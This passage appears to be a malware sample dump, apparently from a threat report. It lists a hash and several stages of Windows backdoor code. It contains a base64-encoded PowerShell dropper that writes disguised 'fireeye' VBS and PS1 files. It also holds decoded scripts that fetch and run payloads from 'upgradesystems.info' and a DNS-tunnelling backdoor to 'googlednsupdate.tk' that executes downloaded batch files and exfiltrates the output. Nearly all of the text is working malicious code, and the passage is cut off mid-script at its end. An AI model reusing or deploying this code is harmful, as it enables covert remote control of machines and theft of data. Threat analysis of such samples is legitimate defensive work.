bmUgJEdsb2JhbDpob3N0TGVuKSkNCiAgICB7DQogICAgICAgICRHbG9iYWw6aG9zdExlbiA9IDEwIA0KICAgICAgICANCiAgICB9DQogICAgd2hpbGUgKCRHbG9iYWw6cmVnRXhpc3QgLWd0IDApDQogICAgew0KICAgICAgICAkcmV0ID0gZG93bmlwIDENCiAgICAgICAgDQogICAgICAgICRHbG9iYWw6cmVnRXhpc3QgPSAkR2xvYmFsOnJlZ0V4aXN0IC0gMQ0KICAgIH0NCiAgICB3aGlsZSAoJEdsb2JhbDpiYXRFeGlzdCAtZ3QgMCkNCiAgICB7DQogICAgICAgICRmaWxlbmFtZSA9ICIiDQogICAgICAgICRmaWxlbmFtZSA9IGRvd25pcCAwIA0KICAgICAgICANCiAgICAgICAgaWYgKCRmaWxlbmFtZSAtbmUgIiIpDQogICAgICAgIHsNCiAgICAgICAgICAgICRiYXRjaEZpbGVQYXRoID0gJEdsb2JhbDpkRm9sZCArICJcIiArICRmaWxlbmFtZQ0KICAgICAgICAgICAgDQogICAgICAgICAgICBSZW5hbWUtSXRlbSAkYmF0Y2hGaWxlUGF0aAkoJGJhdGNoRmlsZVBhdGgrIi5iYXQiKQ0KCQkgICAgJGJhdGNoRmlsZVBhdGggPSAkYmF0Y2hGaWxlUGF0aCsiLmJhdCINCiAgICAgICAgICAgICRyZXN1bHRGaWxlUGF0aCA9ICRnbG9iYWw6dUZvbGQgKyAnXCcgKyAkZmlsZW5hbWUNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gKCgkYmF0Y2hGaWxlUGF0aCAtcmVwbGFjZSAnICcsICdgICcpICsgJyA+ICcgKyAoJHJlc3VsdEZpbGVQYXRoIC1yZXBsYWNlICcgJywgJ2AgJykpOw0KICAgICAgICAgICAgZGVsICgkYmF0Y2hGaWxlUGF0aCkNCiAgICAgICAgICAgICRHbG9iYWw6YmF0RXhpc3QgPSAkR2xvYmFsOmJhdEV4aXN0IC0xIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICB9DQogICAgfQ0KICAgIEdldC1DaGlsZEl0ZW0gJGdsb2JhbDp1Rm9sZCAtZm9yY2UgfCAgICUgew0KICAgICAgICAkXy5GdWxsTmFtZSANCiAgICAgICAgJF8uTmFtZSANCiAgICAgICAgbW92ZSAkXy5GdWxsTmFtZSAoJEdsb2JhbDp0Rm9sZCArICJcIiArICRfLk5hbWUpDQogICAgICAgIHVwaXAgKCRfLk5hbWUpDQogICAgfQ0KfQ0KY2F0Y2gNCnsNCiAgICAkaG9zdG5hbWUgPSAiRSIgKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkgKyhbc3RyaW5nXSRfLkludm9jYXRpb25JbmZvLlNjcmlwdExpbmVOdW1iZXIpICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgDQogICAgW1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkaG9zdG5hbWUpICAgIA0KfQ==')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' $fdn; } "  -->  +++ Set wss = CreateObject("wScript.Shell")HOME = "%userprofile%\AppData\Local\Microsoft\Media\"dnsCmd = "powershell -executionpolicy bypass -file " & HOME & "dn.ps1"wss.Run dnsCmd,0 +++ $scriptdir = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition$Global:domain = "googlednsupdate.tk"$Global:ID = "A1"$Global:dFold = $scriptdir + "\dn"$Global:uFold = $scriptdir + "\up"$Global:tFold = $scriptdir + "\te"$Global:hostLen = 10$Global:regExist = 0$Global:batExist = 0ipconfig /flushdnsFunction IIf($If, $Right, $Wrong) {If ($If) {$Right} Else {$Wrong}}function DNSRequest{    param( [string]$hostname )    $Stoploop = $false    [int]$Retrycount = "0"    $ret = [System.Net.IPAddress[]]("0.0.0.0")    $success = $false    do{        try{            $ret = [System.Net.IPAddress[]][System.Net.Dns]::GetHostAddresses($hostname)            $Stoploop = $true            $success = $true        }        catch{            $success = $false            if ($Retrycount -gt 20){                                $Stoploop = $true                throw            }            else {                            Start-Sleep -Seconds 2                $Retrycount = $Retrycount + 1            }        }    }    while($Stoploop -eq $false)    return $ret}function downip{ param( [int]$type ) $finished = 0 $filename = "" $fileID = 0 $reqStr = "IF"   $hostname = $reqStr[$type] + $Global:ID + (-join ((65..90) + (48..57) + (97..122) | Get-Random -Count 2 | % {[char]$_})) + "." + $Global:domain  $ipAddy = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()    if (($ipAddy[0] -eq $ipAddy[1]) -and ($ipAddy[0] -eq 63)) {        $fileID = [char]$ipAddy[2] + [char]$ipAddy[3]            $finishedFileName = [int]0    $namePart = [int]0    while($finishedFileName -eq 0){        $hostname = "P" + $fileID + [string]$namePart +  (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + "."  + $Global:domain                $ipFileNameAddr = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if ($ipFileNameAddr[0] -eq 68)        {               if (($ipFileNameAddr[1] -eq 127) -or ($ipFileNameAddr[2] -eq 127) -or ($ipFileNameAddr[3] -eq 127)){                $finishedFileName = [int]1             }                                        $filename = $filename + (IIf ($ipFileNameAddr[1] -ne 127) ([char]$ipFileNameAddr[1]) "") + (IIf ($ipFileNameAddr[2] -ne 127) ([char]$ipFileNameAddr[2]) "") + (IIf ($ipFileNameAddr[3] -ne 127) ([char]$ipFileNameAddr[3]) "")            $namepart = [int]$namePart + [int]1        }            }            $finishedData = [int]0    $fsize = [int]0    $tempFilePath =  ($Global:tFold) + "\" + $filename        while($finishedData -eq 0){                $fileHdl = [io.file]::Open($tempFilePath,"Append");        $hostname = "D" + $fileID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + (([string](mybase32UInt32 (Get-Item $tempFilePath).length)).Remove(0,2).Remove(5,1))  + "." + $Global:domain         ([System.Net.IPAddress[]](DNSRequest $hostname)).GetEnumerator()| Sort-Object address | foreach{                                    if ([int]$_.GetAddressBytes()[0] -gt 130)            {                $sequenceIndex = [int]$_.GetAddressBytes()[0] - 240                                 if ([int]$_.GetAddressBytes()[1] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[1])                                    }                if ([int]$_.GetAddressBytes()[2] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[2])                }                if ([int]$_.GetAddressBytes()[3] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[3])                }                if ([int]$_.GetAddressBytes()[3] -eq 127){                     $finishedData = 1                }                                            }        }        $fileHdl.Close()    }        $b64Data = [System.IO.File]::ReadAllBytes($tempFilePath)    $data = [System.Convert]::FromBase64CharArray($b64Data,0,$b64Data.Length)     $filePath =  ($Global:dFold) + "\" + $filename    [io.file]::WriteAllBytes($filePath,$data)    del $tempFilePath    return $filename }  return $filename}function upip{    param( [string]$fname )        $filePath = ($Global:tFold) + "\" + $fname    $success = 0        $hostname = "Y" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))+ $fname.Replace(".","")  + "." + $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (($respBytes[0] -eq $respBytes[1]) -and ($respBytes[0] -eq [byte]74))    {        $uploadID = [char]$respBytes[2] + [char]$respBytes[3]                        $uploadedCompleteSize = [uint32]0        $fileData = (get-content $filePath -encoding byte)        $base32filedata = (base32data $fileData)        while($uploadedCompleteSize -lt $base32filedata.length)        {                                    $hostname = "Q" + $uploadID + ([string](mybase32UInt32 $uploadedCompleteSize)).Remove(0,2).Remove(5,1) + (-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize + $Global:hostLen-8)]) + "." + $Global:domain                                     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                        if ([int]$respBytes[0] -eq 75)            {                $uploadedCompleteSize = [uint32]($respBytes[3]+$respBytes[2]*100+$respBytes[1]*10000)                                            }                            }                $hostname = "Z" + $uploadID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." + $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 76) -and ([int]$respBytes[1] -eq 76) -and ([int]$respBytes[2] -eq 76) -and ([int]$respBytes[3] -eq 76))        {            del $filePath            return "OK"        }    }}function myToUint64{    param( [byte[]]$data )          $retUint = [uint64]0    $powCount = [int]0    for($len=($data.Length-1); $len -ge 0; $len--)    {        $retUint = $retUint + $data[$len] * [Math]::Pow(16,$powCount)        $powCount = $powCount + 2;            }        return $retUint}function base32data{    param( [byte[]]$data )        $ret = ""    if ($data.Length -eq 0) { return ret}    $charmap = "abcdefghijklmnopqrstuvwxyz012345"                for ($fiveByteIndex = 0;$fiveByteIndex -lt  [Math]::Ceiling($data.Length/5); $fiveByteIndex++) #    {                $bytes = [byte[]]$data[($fiveByteIndex * 5)..(IIF ($fiveByteIndex -lt ($data.Length/5)) (($fiveByteIndex*5)+4)  ($data.Length-1))]                        $number =  myToUint64 $bytes                $paddingBitRequire = (5 - (($bytes.Length * 8) % 5)) % 5         $outputB32Len = ($bytes.Length*8 + $paddingBitRequire)/5                for ($powIndex = ($bytes.Length*8 - 1) ; $powIndex -ge 4; $powIndex = $powIndex - 5)        {                     $ret = $ret + $charmap[[Math]::Pow(2,(-1 * $powIndex + 4))*($number -band [uint64]([Math]::Pow(2,$powIndex) + [Math]::Pow(2,$powIndex-1) + [Math]::Pow(2,$powIndex-2) + [Math]::Pow(2,$powIndex-3) + [Math]::Pow(2,$powIndex-4)))]                                       }                if ($powIndex -ge 0)         {                        switch ($powIndex)            {                0 {$ret = $ret + $charmap[$number -band [uint64](1)] + "6"}                1 {$ret = $ret + $charmap[$number -band [uint64](3)] + "7"}                2 {$ret = $ret + $charmap[$number -band [uint64](7)] + "8"}                3 {$ret = $ret + $charmap[$number -band [uint64](15)]+ "9"}            }         }                  }    return $ret        }function mybase32UInt32{    param([uint32]$inputnumber)    $ret = ""    $bytes = ([bitconverter]::GetBytes($inputnumber))    [array]::Reverse($bytes)    return (base32data $bytes)}Try{    if(-not(Test-Path -Path ($global:uFold))){        mkdir $global:uFold    }    if(-not (Test-Path -Path ($global:dFold))){        mkdir $global:dFold    }    if(-not (Test-Path -Path ($global:tFold))){        mkdir $global:tFold    }        if ((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID  -ErrorAction SilentlyContinue) -ne $null)    {        $Global:ID = ([string]((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID).ID)).Substring(0,2)            }        if ($Global:ID -eq "A1")    {        $hostname = "N" + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 5 | % {[char]$_}))  + "." + $Global:domain                 $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 61) -and ([int]$respBytes[1] -eq 61))        {            $Global:ID = [char]$respBytes[2] + [char]$respBytes[3]            New-ItemProperty -Path "HKCU:\Software\Microsoft\FTP" -Name "ID" -Value $Global:ID -PropertyType String -Force                    }    }        $hostname = "C" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." + $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                    if (([int]$respBytes[0] -eq 62))    {        $Global:regExist = $respBytes[1]        $Global:batExist = $respBytes[2]        $Global:hostLen  = $respBytes[3]            }        $hostname = "T" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count ($Global:hostLen-3) | % {[char]$_}))  + "." + $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (([int]$respBytes[0] -ne 65) -or ([int]$respBytes[1] -ne 65) -or ([int]$respBytes[2] -ne 65) -or ([int]$respBytes[3] -ne $Global:hostLen))    {        $Global:hostLen = 10             }    while ($Global:regExist -gt 0)    {        $ret = downip 1                $Global:regExist = $Global:regExist - 1    }    while ($Global:batExist -gt 0)    {        $filename = ""        $filename = downip 0                 if ($filename -ne "")        {            $batchFilePath = $Global:dFold + "\" + $filename                        Rename-Item $batchFilePath    ($batchFilePath+".bat")            $batchFilePath = $batchFilePath+".bat"            $resultFilePath = $global:uFold + '\' + $filename                        Invoke-Expression (($batchFilePath -replace ' ', '` ') + ' > ' + ($resultFilePath -replace ' ', '` '));            del ($batchFilePath)            $Global:batExist = $Global:batExist -1                         }    }    Get-ChildItem $global:uFold -force |   % {        $_.FullName         $_.Name         move $_.FullName ($Global:tFold + "\" + $_.Name)        upip ($_.Name)    }}catch{    $hostname = "E" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) +([string]$_.InvocationInfo.ScriptLineNumber) + "." + $Global:domain         [System.Net.Dns]::GetHostAddresses($hostname)    }
  7. 293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb
  8. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXCINClNFUlZFUj0iaHR0cDovL3VwZ3JhZGVzeXN0ZW1zLmluZm8vdXBncmFkZS1pbmRleC5hc3B4P3JlcT1fX1wiDQpEd249InBvd2Vyc2hlbGwgIiImeyR3Yz0obmV3LW9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCk7JHdjLlVzZURlZmF1bHRDcmVkZW50aWFscz0kdHJ1ZTskd2MuSGVhZGVycy5hZGQoJ0FjY2VwdCcsJyovKicpOyR3Yy5IZWFkZXJzLmFkZCgnVXNlci1BZ2VudCcsJ01pY3Jvc29mdCBCSVRTLzcuNycpO3doaWxlKDEpe3RyeXskcj1HZXQtUmFuZG9tOyR3Yy5Eb3dubG9hZEZpbGUoJyImU0VSVkVSJiItXyZtPWQnLCciJkhPTUUmImRuXCcrJHIrJy4tXycpO1NldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSkpKSAtRW5jb2RpbmcgQnl0ZTskY2Q9JHdjLlJlc3BvbnNlSGVhZGVyc1snQ29udGVudC1EaXNwb3NpdGlvbiddO1JlbmFtZS1JdGVtIC1wYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtbmV3bmFtZSAoJGNkLlN1YnN0cmluZygkY2QuSW5kZXhPZignZmlsZW5hbWU9JykrOSkpfWNhdGNoe2JyZWFrfX19IiIiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gUmVwbGFjZShEd24sIi1fIiwiZHduIiksMA0KRG93bmxvYWRFeGVjdXRlPSJwb3dlcnNoZWxsICIiJnskd2M9KG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpOyR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHM9JHRydWU7JHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTskd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTskcj1HZXQtUmFuZG9tOyR3Yy5Eb3dubG9hZEZpbGUoJyImU0VSVkVSJiItXyZtPWQnLCciJkhPTUUmImRuXCcrJHIrJy4tXycpO1NldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSkpKSAtRW5jb2RpbmcgQnl0ZTtJbnZva2UtRXhwcmVzc2lvbiAoJyImSE9NRSYiZG5cJyskcisnLi1fID4iJkhPTUUmInVwXCcrJHIrJy1fJyk7JGNkPSR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXTtSZW5hbWUtSXRlbSAtcGF0aCAoJyImSE9NRSYidXBcJyskcisnLV8nKSAtbmV3bmFtZSAoJGNkLlN1YnN0cmluZygoJGNkLkluZGV4T2YoJ2ZpbGVuYW1lPScpKzkpLCgkY2QuTGVuZ3RoLTI1KSkrJy5iYXQudHh0Jyk7R2V0LUNoaWxkSXRlbSAiJkhPTUUmInVwXCB8IEZvckVhY2gtT2JqZWN0IHtpZigoR2V0LUl0ZW0gKCRfLkZ1bGxOYW1lKSkubGVuZ3RoIC1ndCAwKXtbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygoW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRfLkZ1bGxOYW1lKSkpIHwgT3V0LUZpbGUgJF8uRnVsbE5hbWU7JHdjLlVwbG9hZEZpbGUoJyImU0VSVkVSJiJ1cGwmbT11JywkXy5GdWxsTmFtZSk7d2FpdGZvciBoYWhhIC9UIDN9O1JlbW92ZS1JdGVtICRfLkZ1bGxOYW1lfTtSZW1vdmUtSXRlbSAoJyImSE9NRSYiZG5cJyskcisnLi1fJyl9IiIiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gUmVwbGFjZShEb3dubG9hZEV4ZWN1dGUsIi1fIiwiYmF0IiksMA0KRG5zQ21kPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICImSE9NRSYiZmlyZWV5ZS5wczEiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gRG5zQ21kLDA=')); Set-Content 'C:\Users\Public\Libraries\fireeye.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLnVwZ3JhZGVzeXN0ZW1zLmluZm8nCiRnbG9iYWw6ZmlsZW5hbWUgPSAnJwokZ2xvYmFsOm15ZmxhZyA9IDAKJGdsb2JhbDpteWlkID0gJyMjIycKJGdsb2JhbDpteWhvbWUgPSAiJGVudjpQdWJsaWNcTGlicmFyaWVzXCIKZnVuY3Rpb24gY29udmVydFRvLUJhc2UzNiAoJGRlY051bT0iIikKewogICAgJGRlY051bSAlPSA0NjY1NgogICAgJGFscGhhYmV0ID0gIjAxMjM0NTY3ODlBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWiIKICAgIGRvCiAgICB7CiAgICAgICAgJHJlbWFpbmRlciA9ICgkZGVjTnVtICUgMzYpCiAgICAgICAgJGNoYXIgPSAkYWxwaGFiZXQuc3Vic3RyaW5nKCRyZW1haW5kZXIsMSkKICAgICAgICAkYmFzZTM2TnVtID0gIiRjaGFyJGJhc2UzNk51bSIKICAgICAgICAkZGVjTnVtID0gKCRkZWNOdW0gLSAkcmVtYWluZGVyKSAvIDM2CiAgICB9CiAgICB3aGlsZSAoJGRlY051bSAtZ3QgMCkKICAgICRiYXNlMzZOdW0uUGFkTGVmdCgzLCcwJykKfQpmdW5jdGlvbiBHZXRTdWIoJG15ZmxhZzIsICRjbWRpZD0nMDAnLCAkcGFydGlkPScwMDAnKQp7CiAgICBpZigkbXlmbGFnMiAtZXEgMCkKICAgIHsKICAgICgnd3cwMDAwMDAnKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KICAgIGVsc2VpZigkbXlmbGFnMiAtZXEgMSkKICAgIHsKICAgICAgICAoJ3d3JyskZ2xvYmFsOm15aWQrJzAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpCiAgICB9CiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDIpCiAgICB7CiAgICAgICAgKCd3dycrJGdsb2JhbDpteWlkKyRjbWRpZCskcGFydGlkKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KfQpmdW5jdGlvbiBTdHIySGV4KCRteXN0cikKewogICAgW1N5c3RlbS5CaXRDb252ZXJ0ZXJdOjpUb1N0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpEZWZhdWx0LkdldEJ5dGVzKCRteXN0cikpLlJlcGxhY2UoIi0iLCAiIikKfQpmdW5jdGlvbiBBbGl2ZQp7CglpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQoJewoJCXJldHVybiAwCgl9CiAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAxKSsnMzAnKQogICAgJHN1YiA9ICgoR2V0U3ViIDEpKycyMzJBJykgKyAoU3RyMkhleCAkZ2xvYmFsOmZpbGVuYW1lKQogICAgJGkgPSAxCiAgICAkcmV0ID0gMAogICAgd2hpbGUoJGdsb2JhbDpteWZsYWcgLWVxIDEpCiAgICB7CiAgICAgICAgJHJldCA9IDEKICAgICAgICAkc3ViMiA9ICRzdWIgKyAoU3RyMkhleCAkaSkKICAgICAgICBTZW5kUmVjZWl2ZUROUyAkc3ViMgogICAgICAgICRpKysKICAgIH0KICAgIGlmKCRyZXQgLWVxIDEpCiAgICB7CiAgICAgICAgRml4QmF0RmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIpCiAgICB9CiAgICAkcmV0Cn0KZnVuY3Rpb24gU2VuZFJlY2VpdmVETlMgKCRkKQp7CgkkY250ID0gMAoJd2hpbGUgKCRjbnQgLWx0IDIwKQoJewoJCXRyeQoJCXsKCQkJJG15ZGF0YSA9IChbU3lzdGVtLk5ldC5ETlNdOjpHZXRIb3N0QnlOYW1lKCRkKyRnbG9iYWw6bXlob3N0KS5BZGRyZXNzTGlzdFswXSkKCQkJJG15ZGF0YSA9ICgkbXlkYXRhIHwgRm9yRWFjaC1PYmplY3QgeyRfLklQQWRkcmVzc1RvU3RyaW5nfSkKCQkJJGNudCA9IDI1CgkJfQoJCWNhdGNoCgkJewoJCQlTdGFydC1TbGVlcCAtbSA1MDAKCQkJJGNudCsrCgkJfQoJfQogICAgaWYoLW5vdCgkY250IC1lcSAyNSkpCiAgICB7CiAgICAgICAgKCcjJysnIyMnKQogICAgfQogICAgZWxzZWlmKCRnbG9iYWw6bXlmbGFnIC1lcSAwIC1hbmQgJG15ZGF0YS5TdGFydHNXaXRoKCczMy4zMy4nKSkKICAgIHsKICAgICAgICAkdG1wID0gJG15ZGF0YS5TdWJTdHJpbmcoNikuU3BsaXQoJy4nKQogICAgICAgICRnbG9iYWw6ZmlsZW5hbWUgPSAoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMQogICAgfQogICAgZWxzZWlmICgkbXlkYXRhLkVxdWFscygnMzUuMzUuMzUuMzUnKSkKICAgIHsKICAgICAgICAkZ2xvYmFsOm15ZmxhZyA9IDAKICAgIH0KICAgIGVsc2VpZiAoJGdsb2JhbDpteWZsYWcgLWVxIDEpCiAgICB7CiAgICAgICAgJHRtcCA9ICRteWRhdGEuU3BsaXQoJy4nKQogICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIsICgoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKSArIChbY2hhcl0gW2ludF0gJHRtcFsyXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbM10pKSkKICAgIH0KICAgIGVsc2VpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQogICAgewogICAgICAgIChbY2hhcl0gW2ludF0gJG15ZGF0YS5TcGxpdCgnLicpWzBdKQogICAgfQp9CmZ1bmN0aW9uIEZpeEJhdEZpbGUgKCRiYXRwYXRoKQp7CiAgICAoR2V0LUNvbnRlbnQgJGJhdHBhdGgpLlN1YnN0cmluZygxMCkgfCBTZXQtQ29udGVudCAkYmF0cGF0aAp9CmZ1bmN0aW9uIFNlbmRGaWxlKCRteUZpbGVQYXRoKQp7CiAgICAkbXlGaWxlTmFtZSA9IFtTeXN0ZW0uSU8uUGF0aF06OkdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbigkbXlGaWxlUGF0aCkKICAgICRteXN0ciA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxUZXh0KCRteUZpbGVQYXRoKQogICAgJGk9MAogICAgJG15dGVtcCA9ICcnCiAgICAkaj0wCiAgICB3aGlsZSgkaSAtbGUgJG15c3RyLkxlbmd0aCkKICAgIHsKICAgICAgICAkbXl0ZW1wICs9ICRteXN0clskaV0KICAgICAgICBpZigoKCRpJTI0KSAtZXEgMjMpIC1vciAoJGkgLWVxICRteXN0ci5MZW5ndGgpKQogICAgICAgIHsKICAgICAgICAgICAgJG15aGV4ID0gU3RyMkhleCAkbXl0ZW1wCiAgICAgICAgICAgIFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDIgJG15RmlsZU5hbWUgKGNvbnZlcnRUby1CYXNlMzYgJGopKSArICRteWhleCkKICAgICAgICAgICAgJGorKwogICAgICAgICAgICAkbXl0ZW1wID0gJycKICAgICAgICB9CiAgICAgICAgJGkrKwogICAgfQp9CmZ1bmN0aW9uIEdldElECnsKICAgICRnbG9iYWw6bXlpZCA9IFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDApKyczMCcpCn0KZnVuY3Rpb24gQ2hhbmdlVGhpc0ZpbGUgKCRib3RpZCkKewoJKEdldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xmaXJlZXllLnBzMSkgLXJlcGxhY2UgKCcjJysnIyMnKSwkYm90aWQgfCBTZXQtQ29udGVudCAkZW52OlB1YmxpY1xMaWJyYXJpZXNcZmlyZWV5ZS5wczEKfQpmdW5jdGlvbiBJbml0CnsKICAgIGlmKCRnbG9iYWw6bXlpZCAtZXEgKCcjJysnIyMnKSkKICAgIHsKCQltZCAtRm9yY2UgKCRnbG9iYWw6bXlob21lKyd0cFwnKQoJCUdldElECgkJQ2hhbmdlVGhpc0ZpbGUgJGdsb2JhbDpteWlkCiAgICB9Cn0KZnVuY3Rpb24gbWFpbgp7CiAgICBJbml0CiAgICBpZihBbGl2ZSAtZXEgMSkKICAgIHsKICAgICAgICBJbnZva2UtRXhwcmVzc2lvbiAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLmJhdCA+ICcrJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICAgICAgU2VuZEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0JykKICAgICAgICBSZW1vdmUtSXRlbSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICB9Cn0KbWFpbg==')); Set-Content 'C:\Users\Public\Libraries\fireeye.ps1' $f;(Get-Content $env:Public\Libraries\fireeye.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\fireeye.vbs}" -->  +++ HOME="%public%\Libraries\"SERVER="http://upgradesystems.info/upgrade-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("WScript.Shell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname 